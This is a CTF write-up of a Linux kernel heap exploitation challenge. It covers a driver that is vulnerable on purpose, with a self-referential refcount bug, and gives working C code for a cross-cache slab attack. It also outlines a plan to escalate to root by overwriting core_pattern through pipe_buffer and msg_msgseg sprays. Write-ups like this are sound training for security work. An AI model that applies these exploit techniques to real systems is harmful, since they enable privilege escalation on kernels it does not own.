Level 2 - not quite baby kernel (linux kernel pwn)

Linux kernel heap pwn

This was the most challenging of the 3 pwnables challenges, and I took about 2 weeks to solve it. It was especially hard given my lack of background in kernel pwn. Fortunately I eventually solved it (although not in the intended way :P)

Challenge files:

The challenge provides us with the following files:

- src
  - paradox.c
  - Makefile
- bzImage
- kernel_config_linux-6.12.38
- rootfs.cpio.gz
- start.sh  

Namely, paradox.c is the C code which implements the vulnerable linux driver, and the Makefile specifies how to compile it. bzImage is a compressed kernel image file, kernel_config_linux-6.12.38 specifies all the config options of the linux kernel, rootfs.cpio.gz is the compressed filesystem, and start.sh runs the kernel.

Before delving into paradox.c let's cover some setup first:

We start by inspecting start.sh to understand the protections the kernel has:

#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 kaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm 

We can see that kaslr is enabled (which means that kernel functions are at a randomised address), and smap and smep are enabled. This means that when in kernel mode, we cannot use data from user pages, and we also cannot run code in user pages.

To make it easier to debug, you should disable kaslr temporarily, and add -s to tell QEMU to open a GDB server on tcp port 1234, and -no-reboot and -no-shutdown so we can stop and see when a kernel crash occurs. Your start.sh will now look like this:

#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 nokaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm \
	-s \
	-no-reboot \
	-no-shutdown

To decompress rootfs.cpio.gz into an actual folder we can use the below decompress.sh:

#!/bin/sh

mkdir rootfs
cd rootfs
cp ../rootfs.cpio.gz .
gunzip ./rootfs.cpio.gz
cpio -idm < ./rootfs.cpio
rm rootfs.cpio

Now I prepare my workflow to compile exploit C code and re-compress the filesystem back into rootfs.cpio.gz, using mycompress.sh and compress.sh.

mycompress.sh:

gcc -O2 -lpthread -static src/solve.c -o src/solve 
mv src/solve rootfs/solve
./compress.sh

compress.sh:

cd rootfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > rootfs.cpio.gz
mv ./rootfs.cpio.gz ../

Now that the prep work is done, let's look at paradox.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/refcount.h>
#include <linux/cdev.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h> 

#define DEVICE_NAME "paradox_engine"

MODULE_LICENSE("GPL");


struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};

static struct kmem_cache *temporal_event_cache;

static void event_erase_from_reality(struct temporal_event *event);

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

static struct temporal_event* find_event_in_timeline(struct timeline *tl, u64 event_id) {
	struct temporal_event *ev;
	if (!tl) return NULL;
	list_for_each_entry(ev, &tl->events_head, timeline_node) {
		if (ev->event_id == event_id) return ev;
	}
	return NULL;
}

#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};
struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};

static int paradox_engine_open(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = kzalloc(sizeof(*session), GFP_KERNEL);
	if (!session) return -ENOMEM;

	mutex_init(&session->lock);

	INIT_LIST_HEAD(&session->all_timelines);
	atomic64_set(&session->next_timeline_id, 0);

	struct timeline *primordial_tl = kzalloc(sizeof(*primordial_tl), GFP_KERNEL);
	if (!primordial_tl) { kfree(session); return -ENOMEM; }
	primordial_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
	atomic64_set(&primordial_tl->next_event_id, 0);
	INIT_LIST_HEAD(&primordial_tl->events_head);
	list_add_tail(&primordial_tl->session_node, &session->all_timelines);

	struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
	if (!first_cause) { kfree(primordial_tl); kfree(session); return -ENOMEM; }
	first_cause->event_id = atomic64_fetch_add(1, &primordial_tl->next_event_id);
	refcount_set(&first_cause->causal_weight, 1);
	strcpy(first_cause->description, "The First Cause");
	first_cause->parent_timeline = primordial_tl;
	list_add_tail(&first_cause->timeline_node, &primordial_tl->events_head);

	filp->private_data = session;
	//printk(KERN_INFO "paradox_engine: New private universe created with Local Causality law.\n");
	return 0;
}

static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}

static long paradox_engine_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *target_tl = NULL, *tmp_tl;
	long ret = 0;

	mutex_lock(&session->lock);

	switch (cmd) {
		case PARADOX_CREATE_TIMELINE:
			{
				struct paradox_timeline_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				struct temporal_event *cause_event = NULL;
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if(tmp_tl->timeline_id == req.cause_timeline_id) {
						cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
						if(cause_event) break;
					}
				}
				if (!cause_event) { ret = -EINVAL; break; }
				struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
				if (!new_tl) { ret = -ENOMEM; break; }
				new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
				atomic64_set(&new_tl->next_event_id, 0);
				INIT_LIST_HEAD(&new_tl->events_head);
				new_tl->caused_by_event = cause_event;
				event_get(cause_event);
				list_add_tail(&new_tl->session_node, &session->all_timelines);
				req.new_timeline_id = new_tl->timeline_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}

		case PARADOX_CREATE_EVENT:
			{
				struct paradox_event_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
				}
				if (!target_tl) { ret = -EINVAL; break; }
				struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
				if (!event) { ret = -ENOMEM; break; }
				event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
				refcount_set(&event->causal_weight, 1);
				strncpy(event->description, req.description, sizeof(event->description) - 1);
				event->parent_timeline = target_tl;
				list_add_tail(&event->timeline_node, &target_tl->events_head);
				if (req.cause_event_id != 0) {
					struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
					if (cause_event) {
						event->causal_dependency = cause_event;
						event_get(cause_event);
					}
				}
				req.new_event_id = event->event_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}
		default:
			ret = -EINVAL;
	}

	mutex_unlock(&session->lock);
	return ret;
}

static const struct file_operations fops = {
	.owner = THIS_MODULE,
	.open = paradox_engine_open,
	.release = paradox_engine_release,
	.unlocked_ioctl = paradox_engine_ioctl,
};

static struct miscdevice dev;

static int dev_init(void) {
	dev.minor = MISC_DYNAMIC_MINOR;
	dev.name = DEVICE_NAME;
	dev.fops = &fops;
	dev.mode = 0644;
	temporal_event_cache = kmem_cache_create("temporal_event_cache",
			sizeof(struct temporal_event),
			0, SLAB_PANIC, NULL);
	if (!temporal_event_cache) {
		printk(KERN_ERR "paradox_engine: Failed to create slab cache.\n");
		return -ENOMEM;
	}

	if (misc_register(&dev)) {
		return -1;
	}


	return 0;
}

static void dev_cleanup(void) {
	misc_deregister(&dev);
}


module_init(dev_init);
module_exit(dev_cleanup);

To be honest, it's quite alot of code, so let me summarise what's going on:

There are 3 main structs, temporal_event and timeline. They have the following structures:

struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};

paradox_engine_open

Each file descriptor that you open when you do open("/dev/paradox_engine", O_RDONLY) invokes paradox_engine_open, which instantiates the session by associating a paradox_session_data with it. We know this because it does

filp->private_data = session;

It also instantiates a timeline object and calls it the primordial timeline, and creates a temporal_event called the first cause. Each session has a list of all timelines, while each timeline has an event it is caused by and a list of events within that timeline.

As for the temporal event, note the following:

struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);

The temporal event comes from its own dedicated cache. This will be important later.

Also note that this event has its refcount causal_weight set to 1.

paradox_engine_ioctl

This function essentially specifies the ways in which a user can interact with the device. In particular, they can choose to either create a timeline or create an event.

Create timeline

Request structure:

struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};

ioctl code:

struct paradox_timeline_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
struct temporal_event *cause_event = NULL;
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if(tmp_tl->timeline_id == req.cause_timeline_id) {
		cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
		if(cause_event) break;
	}
}
if (!cause_event) { ret = -EINVAL; break; }
struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
if (!new_tl) { ret = -ENOMEM; break; }
new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
atomic64_set(&new_tl->next_event_id, 0);
INIT_LIST_HEAD(&new_tl->events_head);
new_tl->caused_by_event = cause_event;
event_get(cause_event);
list_add_tail(&new_tl->session_node, &session->all_timelines);
req.new_timeline_id = new_tl->timeline_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;

When creating a timeline, a user must specify the timeline and its event which caused this new timeline to occur. The timeline is created with the next id available, and it is added to the session. The event that caused this timeline gets event_get called on it, which basically increases the refcount causal_weight. If the request was successful, the new timeline's id is returned to the user.

Create event

Request structure:

struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};

ioctl code:

struct paradox_event_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
}
if (!target_tl) { ret = -EINVAL; break; }
struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
if (!event) { ret = -ENOMEM; break; }
event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
refcount_set(&event->causal_weight, 1);
strncpy(event->description, req.description, sizeof(event->description) - 1);
event->parent_timeline = target_tl;
list_add_tail(&event->timeline_node, &target_tl->events_head);
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}
req.new_event_id = event->event_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;

Once again the event is allocated from the temporal_event_cache and its data is zeroed. Its refcount is initialised to 1. The user's description is copied to the object, and the event that caused this event to happened has its refcount increased by 1. If req.cause_event_id is 0, however, that means that the new event isn't caused by another event. If the request is successful, the driver returns the event's id to the user.

Looking for the vuln

For some background, refcount bugs are rather common, and are usually used to count how many times an object was referred to. When its refcount drops to 0 it is usually freed. This case is no different: When event_put is called on an object and its refcount goes from 1 -> 0, the object is freed:

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

It actually took me some time (and gpting) to figure out the vuln, but eventually I realised a problem: When we create a temporal event, the event is added to its timeline BEFORE we run the following if block:

// event is added to the target timeline first!
list_add_tail(&event->timeline_node, &target_tl->events_head);
// THEN we find its cause event and set it as its causal dependency
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}

This results in it being possible for an event to have itself as its causal dependency.

paradox_engine_release

Let's see the implication of this in paradox_engine_release, which is called when the driver is closed:

static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}

It iterates through each timeline. Within each timeline it iterates through each event, and walks its cause = event->causal_dependency, calling event_put every time it finds a new cause. Once that's done, the pointer to its causal_dependency is zeroed, and the event itself has event_put called on it.

Then it iterates through each timeline in the session, calling event_put on the event which caused the timeline. Finally the timeline is freed.

Thereafter, the session is freed.

Implications

If an event has itself as a causal_dependency, what happens is that when we close the driver, the loop

while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}

perpetually has the same event as its cause, and keeps calling event_put on it. Let's look at event_put again:

static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

What this means is that whenever the refcount causal_weight hits 0 the event gets kfreed. What happens if it goes below 0 (which occurs when the self-referring event gets freed)? Apparently, this causes the refcount to underflow to a value such as 0xC0000000 or 0xBFFFFFFF. It DOES NOT immediately lead to a double-free, and the kfree will still only occur once.

🐛 More tips for debugging

Before exploitation, you may also find the following helpful to make debugging easier:

  • Using the linux source code for linux 6.12.38 from https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.12.38.tar.xz, you should recompile the kernel with debugging symbols. Most CTF challenges (including this one) do not provide kernels with debugging symbols.

    • If you don't want to do this, you can also use this tool to convert the compressed bzImage into an uncompressed vmlinux, then use this tool to convert the vmlinux to an elf. This should be able to recover most symbols to make debugging easier. Then, to debug, do gdb ./kernelelf then target remote :1234 when your kernel is running

  • Use the bata24 gef debugger, it is ahead of pwndbg and the main gef fork. It comes with many features supporting kernel debugging. I found the commands pagewalk-with-hints, slub-dump, xf and slab-contains most helpful.

    • To easily find the victim object when debugging, all I needed to do was find its description using xf "self-referring event"

Verifying trivial wins

Take note that there can actually be trivial leaks in kernel challenges via dmesg or kernel warnings or similar. However, in init.sh we see these two lines:

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 2 > /proc/sys/kernel/kptr_restrict

so trivial leaks are unfortunately out of the question.

I also tried to look for n-days in the given linux kernel itself, but unfortunately couldn't find any.

Exploitation

Here are the high-level steps my exploit follows, which I will elaborate on later:

  1. Perform a cross-cache attack on a self-referring event, ensuring that its page can get reclaimed by a CPU we control.

  2. Spray pipe_buffer and reclaim the page with the page data of the pipe_buffer. Write bytes into all the pipe_buffers until we find which one's page reclaimed the victim, and the offset of the victim temporal_event in the page.

  3. Spray ENLARGED pipe_buffers so that the pipe_buffer struct reclaims an order 9/10 page.

    1. Write 1 byte into each pipe fd then read 1 byte from it to fill the first pipe. Subsequent writes/splices will use the second pipe in the ring.

  4. Reset the victim's refcount to 1, and partially overwrite the victims temporal_event * to point to the previously reclaimed order 9/10 page. The infinite loop causes that page to get kfreed.

  5. Reclaim the previously order 9/10 page by spraying msg_msgseg. This "releases" the infinite loop and the CPU that was previously running the loop. We not have a msg_msgseg overlapping multiple pipe_buffers.

  6. Call syscall vmsplice to vDSO memory page into the pipe_buffers from stage 3. This causes the second pipe in the UAF'd page to have its struct page address point to a page responsible for kernel text.

  7. Read from msg_msgseg to leak the address of the page * for kernel text.

  8. Prepare a fake pipe buffer with page and offset value calculated point to the core_pattern page's address and set PIPE_BUF_FLAG_CAN_MERGE for the pipe flags.

  9. Reclaim the previously freed msg_msgseg by spraying msg_msgseg again, overwriting the second pipe_buffer in the UAF'd page with the page * for core_pattern.

  10. Write to the pipe_buffer to overwrite core_pattern, and trigger a crash to get a root shell.

Part 1. Cross-cache attack

Remember how earlier we said that temporal events are allocated using a dedicated cache because we do this?:

struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);

This makes exploitation more difficult because when we free a temporal_event the page still belongs in temporal_event_cache . When we then allocate other objects, they use pages from different caches. i.e. they will not make use of the freed page (and thus not use our victim object!)

But there is a technique called cross-cache attack which allows us to still make this happen. The cross-cache attack allows the victim page to be reclaimed by any other object, reopening more exploitation techniques!

To perform this technique, I found these black hat slides particularly instructional. The gist of it is:

  1. Pin task to a CPU

  2. Drain partially free slabs

  3. Allocate objs_per_slab * (1 + cpu_partial) objects (you can find these in /sys/kernel/slab/temporal_event_cache/cpu_partial and /sys/kernel/slab/temporal_event_cache/objs_per_slab )

/sys/kernel/slab/temporal_event_cache # cat cpu_partial
120
/sys/kernel/slab/temporal_event_cache # cat objs_per_slab
36
  1. Allocate objs_per_slab - 1 objects as pre-alloc objects

  2. Allocate victim object

  3. Allocate objs_per_slab + 1 objects as post-alloc objects

  4. Free victim, pre-alloc and post-alloc objects

  5. Free one object per slab from step 2

    1. This triggers flushing of CPU partial list, allowing the victim slab to be released to the page allocator

At this point my code for the cross-cache attack looked something like this:

#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120

...
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}
...
void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
pin_this_thread_to_cpu(0);
fd2 = open(DEVICE_PATH, O_RDONLY);
fd1 = open(DEVICE_PATH, O_RDONLY);
// getchar();
if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
printf("[+] devices opened\n");
printf("[*] creating events...\n");
// drain partially-free slabs
uint64_t partiallyfrees[CPU_PARTIAL + 1];
dev_create_timeline(fd2, 0, 0);
for (int i = 0; i < 34; i++) {
    uint64_t evt;
    evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    if (evt < 0) printf("[x] evt!");
}

for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % OBJS_PER_SLAB == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd2, 1, 0, "fd2event");
    }
    if (evt < 0) printf("[x] evt!");
}
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < CPU_PARTIAL + 1; i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt = dev_create_event(fd1, 1, 0, "pre-alloc object");
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[*] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);
printf("[*] Freeing self-referential event...\n");

pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt = dev_create_event(fd1, 1, 0, "post-alloc object");
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}
// sleep(0.01)
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);
...

Note that regardless of which fd you use to create events, they use the same cache and pages. Essentially the events created on fd2 would get freed first on cpu1 followed by the events created on fd1 which would get freed on cpu0.

My intention was for the (OBJS_PER_SLAB - 1) * CPU_PARTIAL objects and the self-referring event to be freed first on cpu1. Thereafter, the pre-alloc and post-alloc objects would be free on cpu0.

This was a costly mistake, since freeing the self-referring event on cpu1 first causes the victim page to be on cpu1's per-cpu partial list, and cpu1 was the cpu with the infinite loop which I couldn't control.

🧠 The solution to this was quite simple: Instead of freeing the self-referring event first, free the pre-alloc and post-alloc objects first!

Here's the final working cross-cache code:

void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
void *fillcpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
}
...
void *freecpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
}
...
pin_this_thread_to_cpu(0);
fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
// getchar();
printf("[+] devices opened\n");
printf("[+] creating events...\n");

uint64_t partiallyfrees[CPU_PARTIAL + 1];
for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % 2 == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
    }
    if (evt < 0) printf("[x] evt!");
}

pthread_t t1;
pthread_create(&t1, NULL, fillcpu1, NULL);
pthread_join(t1, NULL);
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[+] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "post-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "post-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}

close(fd5);
// pause();
pthread_t t2;
pthread_create(&t2, NULL, freecpu1, NULL);
pthread_join(t2, NULL);
printf("[+] Freeing self-referential event...\n");
pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);
// sleep(5); // bro...
// block until the other thread enters
sleep(1);
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);

Half of the pre- and post-alloc objects are in fd1, while half are in fd5. The self-referring object uses fd2.

The key difference is: I first close fd5 to free half the pre- and post- alloc objects in CPU 0, to get the victim slab in CPU 0's partial list

With this, after the cross-cache attack my victim page was in the free area and could be reclaimed by CPU 0!

Part 2. Spraying pipe_buffer to reclaim victim page

When we inspect the victim page, this is what we will see:

...
0xffff888006494bd0|+0x0bd0|+378: 0x0000000000000001 <- victim event id
0xffff888006494bd8|+0x0bd8|+379: 0x00000000bfffffff <- victim refcount
0xffff888006494be0|+0x0be0|+380: 0xffff888006494bd0 <- victim's dependency (itself)
0xffff888006494be8|+0x0be8|+381: 0x6665722d666c6573 'self-referring event'
0xffff888006494bf0|+0x0bf0|+382: 0x6520676e69727265 'erring event'
0xffff888006494bf8|+0x0bf8|+383: 0x00000000746e6576 ('vent'?)
0xffff888006494c00|+0x0c00|+384: 0x0000000000000000
0xffff888006494c08|+0x0c08|+385: 0xa36fb47ca526c672 <- mangled freelist pointer
0xffff888006494c10|+0x0c10|+386: 0x0000000000000000
0xffff888006494c18|+0x0c18|+387: 0x0000000000000000
0xffff888006494c20|+0x0c20|+388: 0x0000000000000000
0xffff888006494c28|+0x0c28|+389: 0xdead000000000100
0xffff888006494c30|+0x0c30|+390: 0xdead000000000122
0xffff888006494c38|+0x0c38|+391: 0xffff8880060d9900 <- parent timeline
0xffff888006494c40|+0x0c40|+392: 0x000000000000089d <- start of next temporal_event
0xffff888006494c48|+0x0c48|+393: 0x0000000000000000
0xffff888006494c50|+0x0c50|+394: 0x0000000000000000
0xffff888006494c58|+0x0c58|+395: 0x6c6c612d74736f70 'post-alloc object'
0xffff888006494c60|+0x0c60|+396: 0x63656a626f20636f 'oc object'
0xffff888006494c68|+0x0c68|+397: 0x0000000000000074
0xffff888006494c70|+0x0c70|+398: 0x0000000000000000
0xffff888006494c78|+0x0c78|+399: 0xd36fb47ca526cd22
0xffff888006494c80|+0x0c80|+400: 0x0000000000000000
0xffff888006494c88|+0x0c88|+401: 0x0000000000000000
0xffff888006494c90|+0x0c90|+402: 0x0000000000000000
0xffff888006494c98|+0x0c98|+403: 0xdead000000000100
0xffff888006494ca0|+0x0ca0|+404: 0xdead000000000122
0xffff888006494ca8|+0x0ca8|+405: 0xffff8880060d9980  ->  0x0000000000000000
...

For reference here's the temporal_event struct:

struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};

